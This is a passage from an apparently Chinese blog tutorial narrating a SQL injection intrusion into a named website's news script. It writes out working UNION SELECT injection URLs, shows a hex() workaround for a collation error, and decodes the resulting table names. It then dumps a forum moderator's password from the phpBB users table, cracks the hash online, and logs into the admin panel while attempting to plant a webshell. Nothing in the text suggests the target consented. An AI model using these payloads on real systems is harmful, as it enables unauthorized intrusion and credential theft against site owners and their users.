开始操作，提交
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME%20%20from%20information_schema.STATISTICS/*
貌似没有出现想象中的效果
                                         

提示
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

看来是union 前后字符集不搭配，只好编码一下了，提交
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,hex(TABLE_SCHEMA),hex(TABLE_NAME),hex(COLUMN_NAME)%20%20from%20information_schema.STATISTICS/*
                                         

这次正常了，连上我自己的mysql，将16进制的编码还原
mysql> select 0x6A6179776562;
+----------------+
| 0x6A6179776562 |
+----------------+
| jayweb |
+----------------+
1 row in set (0.00 sec)
mysql> select 0x41646D696E5F4964;
+--------------------+
| 0x41646D696E5F4964 |
+--------------------+
| Admin_Id |
+--------------------+
1 row in set (0.00 sec)
mysql> select 0x61646D696E;
+--------------+
| 0x61646D696E |
+--------------+
| admin |
+--------------+
1 row in set (0.00 sec)
这里表名出来了，是admin，但是没有暴出密码字段名，我们可以通过使用limit语法逐个表和字段查询，但是数据库很多表的话，不晓得什么时候才能摸清楚。刚好网站上有个phpbb的论坛，还是通过跨库查论坛数据库吧。
看了下，管理员有一个admin一个webmater，看样子webmater比较活跃，就查他的密码了。
提交
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,username,user_password%20%20from%20phpbb_users%20where%20user_id=66333
                                              
到www.cmd5.com上查询出来密码是 ：042990
登陆后台去参观下吧 ：）
                                               
     对phpbb不是很熟悉，在后台琢磨了半天，尝试了添加上传类型等办法都没能得到webshell，难道只能渗透到这个程度吗？

上一页  [1] [2] [3] 下一页